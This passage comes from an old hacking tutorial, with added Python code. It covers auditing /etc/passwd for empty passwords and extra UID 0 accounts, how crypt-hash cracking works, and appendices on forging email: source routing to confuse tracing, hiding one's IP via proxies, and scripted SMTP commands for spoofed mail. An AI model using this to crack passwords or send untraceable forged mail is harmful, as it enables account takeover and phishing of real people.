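            entries.append({"line": str(lineno), "name": parts[0],
                            "error": "expected 7 fields, got %d" % len(parts)})
            continue
        entry = dict(zip(FIELDS, parts))
        entry["line"] = str(lineno)
        entries.append(entry)
    return entries


def password_state(field: str) -> str:
    """Classify the second field:
    ''      -> no password at all: the username alone logs you in
    'x'     -> the hash lives in /etc/shadow
    '$id$.' -> a modular-crypt hash (MD5/SHA-256/SHA-512 ...)
    13 chars of [./0-9A-Za-z] -> a traditional DES crypt hash
    anything else (e.g. '*' or '!') -> can't match any password: locked"""
    if field == "":
        return "empty"
    if field == "x":
        return "shadowed"
    if field.startswith("$"):
        return "hashed"
    if len(field) == 13 and set(field) <= CRYPT_CHARS:
        return "des-crypt"
    return "locked"


def audit(text: str) -> List[str]:
    """The findings an admin (or an attacker) wants from a password file."""
    findings: List[str] = []
    for e in parse_passwd(text):
        if "error" in e:
            findings.append("line %s (%s): %s" % (e["line"], e["name"], e["error"]))
            continue
        if password_state(e["passwd"]) == "empty":
            findings.append("%s: empty password field, logs in without a password" % e["name"])
        if e["uid"] == "0" and e["name"] != "root":
            findings.append("%s: UID 0, same privileges as root" % e["name"])
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_PASSWD):
        print(finding)
```

Run it against a real /etc/passwd with audit(open("/etc/passwd").read()); on a system with shadow passwords every second field is x, so the interesting findings are the extra UID 0 entries.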
Cracking the encrypted password
For this you need a password cracker. A password cracker is a
program that takes a word out of a dictionary file (also referred
to as a "wordlist"), or a combination of letters, numbers etc' that
the program makes up systematically ("brute-force cracking"), hashes
it with the same crypt() function Unix uses (and the same salt, which
is stored in the first two characters of the hash) and then compares
the result to the hashes in a given password file. If they match, it
announces the correct password for that username.
34. Thread - right now I'm talking about threads in discussion lists
and message boards, not on computer programs. We'll discuss about
these in a later time (maybe).
A thread is a series of posts which started out from a single one.
Let me demonstrate: a person starts a thread by stating a fact or
making an opinion. Then, another person comes into the discussion
list or into the message board and states his opinion on the
subject. Then another person joins in and reply to the replier's
opinion. Then another one comes, but chooses to reply to the
original message instead since he has nothing to say regarding the
other messages (if he does, he can post two messages). You get the
picture...
Appendix A: Fake Daemons(1)
I found these two fake daemons (Sendmail and Telnet(19)) at
packetstorm.securify.com once. They're great to fool attackers and
to play tricks on your friends.
These are Perl (a programming language) programs.
To execute them (no, executing a file doesn't have anything to do
with killing it...) on Unix, simply type ./filename and replace
filename with the name of the file you wish to execute. Every Unix
"flavor", "distribution" or whatever you want to
call it, comes with Perl (I think. Correct me if I'm wrong: barakirs@netvision.net.il).
To execute them under DOS/Windows, you have to download Active Perl
from www.activeperl.com and then simply double click them.
I don't know how to execute them under Mac. I guess Active Perl
supports Macs, but I'm not sure.
Now, on to the fake daemons.
These two daemons came in a single package together with a readme
file. Following are all three files. I did not alter any of those
files, it's up to you to do so. Play with them and learn.
Oh, by the way, if you wish to learn Perl (or any other programming
language), head off to http://blacksun.box.sk and find the books
section.
Enjoy!
== Readme ==
heh.. this piece is no way serious, but if anyone think it would be
cool to
keep working on the piece, drop a line with your ideas. We may
develop it
further. ;-). I basically coded it just for fun, when I had few
spare
minutes.
The piece is supposed to be `want-to-be-Windog-Deception-toolkit'
which
contains sample sendmail.pl and telnetd.pl which are supposed to be
fake
sendmail and telnet daemons. To run this code you will need to
download
and install perl for windoze. (I used active perl from
http://www.activeware.com to test it).
Hope you will have fun with it
C.P.
fygrave@tigerteam.net
Sun May 23 17:12:51 KGST 1999
== End of Readme ==
Appendix B: Routing Mail
You can make your mail go through several different servers in order
to make the header longer and confuse people who would try to track
it down.
Example: if you want to send the fake mail to blah@blah.com, and
route it through blaha.com, blahb.com and blahc.com, then in the
'rcpt to:' part, simply do this: rcpt to:<@blaha.com,@blahb.com,@blahc.com:blah@blah.com>
This is the source route syntax from RFC 821: the whole path goes in
angle brackets, the hosts before the colon are visited in that
order, and each of them has to be willing to relay mail for you.
Note: this will not work on every Sendmail daemon. Many servers
ignore the route part and deliver straight to the final address, or
refuse to relay at all, so send yourself a test mail and read its
Received: lines to see which hops actually happened.
Thanks to Magnus Kristiansen for this one! ;-)
Appendix C: Faking your IP
So you don't want people to find your IP and your hostname when they
look at the full header? Then simply hide your IP!
You can do this by using Wingates or SOCKS firewalls, or by
telnetting to the Sendmail daemon from a shell account. If you use
either one of those, the full header will show the Wingate's/SOCKS
firewall's/shell provider's IP address.
If you find a shell account that allows you to telnet out of it, you
can use it to hide your IP. Otherwise, use Wingates or SOCKS
firewalls. To learn more about them, read our Proxy/Wingate/SOCKS
tutorial and our anonymity tutorial at blacksun.box.sk.
Keep in mind that whatever you go through sees, and may well log,
your real IP address: this hides you from the recipient, not from
the owner of the proxy or shell box.
Also, we recommend going to the books section on our website and
downloading the excellent item called "IP Spoofing
Demystified". The stuff written in there may not be so
practical, but it is very important reading (you will learn a lot of
important stuff that you could use later).
Appendix D: Reply-to
The Reply-to header does the following: when a person receives an
Email with a Reply-to address and sends a reply, the reply is sent
to the address specified in the Reply-to header (this does not
work on really really old Email clients).
To use it, simply insert this line:
Reply-to: some-user@some-server.net
and replace some-user and some-server.net with the appropriate user
and server. This line has to be in the header block, i.e. among the
From:, To: and Subject: lines before the first empty line of the
message; a Reply-to: line typed after the empty line is just part of
the body and is ignored.
Appendix E: CC and BCC
CC is used to send a copy of a message to other people who are not
the main recipients of the message, but might need the information
in it. BCC does the same, only the other recipients cannot see who
got a blind copy.
The B in BCC stands for Blind, while the CC stands for Carbon Copy
(like when you copy a page using... nevermind). So BCC stands for
Blind Carbon Copy while CC stands for Carbon Copy. Exciting, isn't
it? Thanks to i2tb for this information.
Want to use CCs and BCCs within your fake Emails? No problem!
A CC: line works exactly like the Reply-to line in Appendix D: put
CC: followed by the addresses in the header block, and also give
each of those addresses its own rcpt to: command, because Sendmail
delivers to the rcpt to: addresses, not to the ones in the headers.
BCC is different: do NOT type a BCC: line at all, since everything in
the header block goes to every recipient and would give the blind
copy away. Just add an extra rcpt to: for the hidden recipient and
leave that address out of the headers.
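Appendices B, D and E all come down to one thing: the envelope (mail from / rcpt to) and the header block are separate, and Sendmail delivers according to the envelope. The block below is an added example (not code from the original article) that builds the exact lines you would type for a mail with a source route, a Reply-To, a Cc and a Bcc, and feeds them through a minimal fake Sendmail that records what a real server would see. All hostnames and addresses are the made-up ones used in the appendices; the reply strings imitate Sendmail's wording but are invented for the example.

```python
from typing import Dict, List, Sequence, Tuple


def smtp_commands(mail_from: str, to: List[str], subject: str, body: str,
                  cc: Sequence[str] = (), bcc: Sequence[str] = (),
                  reply_to: str = "", route: Sequence[str] = ()) -> List[str]:
    """The exact lines you would type at a Sendmail port-25 prompt.

    Every To, Cc and Bcc address gets its own RCPT TO, but only To and Cc
    are written into the headers: a Bcc: header typed into DATA would be
    delivered to everybody and give the blind copy away (Appendix E).
    route is the Appendix B source route: RCPT TO:<@host1,@host2:user@dest>.
    """
    lines = ["HELO my.fake.host", "MAIL FROM:<%s>" % mail_from]
    prefix = ",".join("@" + h for h in route)
    for rcpt in list(to) + list(cc) + list(bcc):
        lines.append("RCPT TO:<%s>" % (prefix + ":" + rcpt if prefix else rcpt))
    lines.append("DATA")
    lines += ["From: %s" % mail_from, "To: %s" % ", ".join(to)]
    if cc:
        lines.append("Cc: %s" % ", ".join(cc))
    if reply_to:
        lines.append("Reply-To: %s" % reply_to)   # header block only (Appendix D)
    lines.append("Subject: %s" % subject)
    lines.append("")                               # the empty line ends the headers
    for text in body.splitlines():
        # dot-stuffing: a body line starting with '.' gets a second '.'
        lines.append("." + text if text.startswith(".") else text)
    lines += [".", "QUIT"]
    return lines


class FakeSmtpServer:
    """Just enough of RFC 821 to record what a real server would see."""

    def __init__(self) -> None:
        self.sender = ""
        self.recipients: List[str] = []
        self.message: List[str] = []
        self.in_data = False

    def reply(self, line: str) -> str:
        if self.in_data:
            if line == ".":
                self.in_data = False
                return "250 Message accepted for delivery"
            self.message.append(line[1:] if line.startswith(".") else line)
            return ""                              # silent while collecting DATA
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "HELO":
            return "250 mailgw.someone.com Hello %s, pleased to meet you" % arg
        if verb == "MAIL":
            self.sender = arg.split(":", 1)[1].strip("<>")
            return "250 %s... Sender ok" % self.sender
        if verb == "RCPT":
            self.recipients.append(arg.split(":", 1)[1].strip("<>"))
            return "250 %s... Recipient ok" % self.recipients[-1]
        if verb == "DATA":
            self.in_data = True
            return '354 Enter mail, end with "." on a line by itself'
        if verb == "QUIT":
            return "221 mailgw.someone.com closing connection"
        return "500 Command unrecognized"

    def headers(self) -> Dict[str, str]:
        """The header block is everything before the first empty line."""
        hdrs: Dict[str, str] = {}
        for line in self.message:
            if line == "":
                break
            name, _, value = line.partition(":")
            hdrs[name.strip().lower()] = value.strip()
        return hdrs


def transcript(lines: List[str]) -> Tuple[FakeSmtpServer, List[str]]:
    """Run the client lines through the fake server and return it together
    with the two-sided dialogue (C: client, S: server)."""
    srv = FakeSmtpServer()
    log = ["S: 220 mailgw.someone.com ESMTP Sendmail ready"]
    for line in lines:
        log.append("C: " + line)
        answer = srv.reply(line)
        if answer:
            log.append("S: " + answer)
    return srv, log


if __name__ == "__main__":
    cmds = smtp_commands("someone@not.an.actual.host.com", ["blah@blah.com"],
                         "hello", "Hello there.", cc=["cc@blahd.com"],
                         bcc=["hidden@blahe.com"], reply_to="me@somewhere.net",
                         route=["blaha.com", "blahb.com"])
    for entry in transcript(cmds)[1]:
        print(entry)
```

Reading the recorded state shows the point of the appendices: hidden@blahe.com is in srv.recipients (it gets the mail) but nowhere in srv.message (nobody else learns that), while the Reply-To and Cc only exist in the header block.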
References
RFC 821 - the SMTP RFC. Can be found at http://freesoft.org/CIE/RFC/821/index.htm.
Thanks to Chris Karwoski for this one. ;-)
Bibliography
1) Sam Spade's library - http://www.samspade.org.
2) Various online magazines.
3) BugTraq's archives - http://www.securityfocus.com/level2/bottom.html?go=search
4) Packet Storm Security - http://packetstorm.securify.com
5) Security Focus - http://www.securityfocus.com
6) Rootshell - http://www.rootshell.com
7) Hackersclub - http://www.hackersclub.com